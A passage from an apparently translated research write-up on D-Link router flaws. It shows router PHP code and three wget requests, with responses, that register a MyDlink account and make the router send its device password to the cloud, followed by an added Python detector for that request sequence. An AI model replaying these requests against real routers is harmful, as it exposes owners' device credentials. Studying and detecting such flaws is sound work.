
D-Link: Research on Ten 0-Day Vulnerabilities (with Detailed Walkthrough)

Source: compiled by this site  Author: anonymous  Date: 2017-09-13
$post_url_signup = "/signin/";
$action_signup = "signup";

//sign in
$post_str_signin = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
            "&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"]." ";
$post_url_signin = "/account/?signin";
$action_signin = "signin";

//add dev (bind device)
$post_str_adddev = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
            "&dlife_no=" .$mydlink_num. "&device_password=" .$devpasswd. "&dfp=" .$dlinkfootprint." ";
$post_url_adddev = "/account/?add";
$action_adddev = "adddev";

//main start
if($action == $action_signup)                    // 1st request
{
        $post_str = $post_str_signup;
        $post_url = $post_url_signup;
        $withcookie = "";   //signup dont need cookie info
}
else if($action == $action_signin)               // 2nd request
{
        $post_str = $post_str_signin;
        $post_url = $post_url_signin;
        $withcookie = "\r\nCookie:; mydlink=pr2c11jl60i21v9t5go2fvcve2;";
}
else if($action == $action_adddev)               // 3rd request
{
        $post_str = $post_str_adddev;
        $post_url = $post_url_adddev;
}
Three HTTP requests are sent to the router to exploit this vulnerability:
The first request (signup) creates a user on the MyDlink service:
user@kali:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=signup&lang=en&outemail=MYEMAIL@GMAIL.COM&passwd=SUPER_PASSWORD&firstname=xxxxxxxx&lastname=xxxxxxxx' http://ip/register_send.php
<register_send>
   <result>success</result>
   <url>http://mp-us-portal.auto.mydlink.com</url>
</register_send>
The router forwards this request to the MyDlink Cloud APIs:
$post_str_signup = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
                   "&action=sign-up&accept=accept&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"].
                   "&password_verify=" .$_POST["passwd"]. "&name_first=" .$_POST["firstname"]. "&name_last=" .$_POST["lastname"]." ";
With the second request (signin), the router associates the account with the newly created user, without activating it:
user@kali:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=signin&lang=en&outemail=MYEMAIL@GMAIL.COM&passwd=SUPER_PASSWORD&firstname=xxxxxxxx&lastname=xxxxxxxx' http://ip/register_send.php
<register_send>
  <result>success</result>
  <url>http://mp-us-portal.auto.mydlink.com</url>
</register_send>
The router forwards this request to the MyDlink Cloud APIs:
$post_str_signin = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
            "&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"]." ";
The third request associates the device with the dlink service and sends the device password to the remote API.
user@kali:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=adddev&lang=en' http://ip/register_send.php
<register_send>
  <result>success</result>
  <url>http://mp-us-portal.auto.mydlink.com</url>
</register_send>
The router forwards this request to the MyDlink Cloud APIs:
$post_str_adddev = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
            "&dlife_no=" .$mydlink_num. "&device_password=" .$devpasswd. "&dfp=" .$dlinkfootprint." ";
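The three-request sequence described above can be looked for in captured HTTP traffic in front of the router. The following Python detector is an added example, not part of the original article or of D-Link's code; the record layout, the 10-minute correlation window and the sample entries are constructed assumptions.

```python
from datetime import datetime, timedelta
from urllib.parse import parse_qs

ENDPOINT = "/register_send.php"           # path taken from the requests above
ACTIONS = ("signup", "signin", "adddev")  # values of the 'act' parameter
WINDOW = timedelta(minutes=10)            # assumed correlation window

# Constructed sample records: (timestamp, client, method, path, POST body).
SAMPLE_LOG = [
    ("2017-09-13T10:00:01", "192.0.2.10", "POST", ENDPOINT,
     "act=signup&lang=en&outemail=a%40example.com&passwd=x"),
    ("2017-09-13T10:00:05", "192.0.2.10", "POST", ENDPOINT,
     "act=signin&lang=en&outemail=a%40example.com&passwd=x"),
    ("2017-09-13T10:00:09", "192.0.2.10", "POST", ENDPOINT, "act=adddev&lang=en"),
    ("2017-09-13T10:05:00", "192.0.2.20", "POST", ENDPOINT, "act=signup&lang=en"),
    ("2017-09-13T11:00:00", "192.0.2.30", "POST", ENDPOINT, "act=adddev&lang=en"),
    ("2017-09-13T11:30:00", "192.0.2.40", "GET", ENDPOINT, ""),
]

def detect(records, window=WINDOW):
    """Alert on every adddev request (the step that sends the device
    password to the cloud); mark it when the same client sent signup
    and then signin within the window beforehand."""
    seen = {}    # client -> {action: time last seen}
    alerts = []
    for ts, client, method, path, body in sorted(records):
        if method != "POST" or path.split("?", 1)[0] != ENDPOINT:
            continue
        act = parse_qs(body).get("act", [""])[0]
        if act not in ACTIONS:
            continue
        when = datetime.fromisoformat(ts)
        history = seen.setdefault(client, {})
        history[act] = when
        if act == "adddev":
            up, inn = history.get("signup"), history.get("signin")
            full = (up is not None and inn is not None
                    and up <= inn <= when and when - up <= window)
            alerts.append({"client": client, "time": ts, "full_sequence": full})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

An `adddev` alert without the preceding steps is still worth triage, since that request alone causes the device password to be sent to the remote API.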
